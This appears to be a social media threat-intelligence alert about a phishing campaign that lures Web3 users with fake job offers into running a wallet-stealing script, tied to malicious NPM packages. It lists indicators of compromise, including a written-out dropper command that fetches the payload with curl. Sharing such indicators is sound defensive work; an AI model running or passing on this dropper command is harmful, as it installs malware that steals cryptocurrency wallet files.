đš Security TI Alert đš
According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.
đ Key IOCs:
đžGitLab repo: https://t.co/ivGN93PS4b
đžDropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
đ§Ș The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code:
https://t.co/bBC4i2vYpA
đš We found that a new malicious NPM package was just published:
https://t.co/SjgmO1FOIL
đžLikely linked GitHub: apollo-hero
đžUploader email: skelstar125@gmail.com
â ïž Do NOT install or run unknown packages or scripts. Always verify sources.
#LAZARUS #Phishing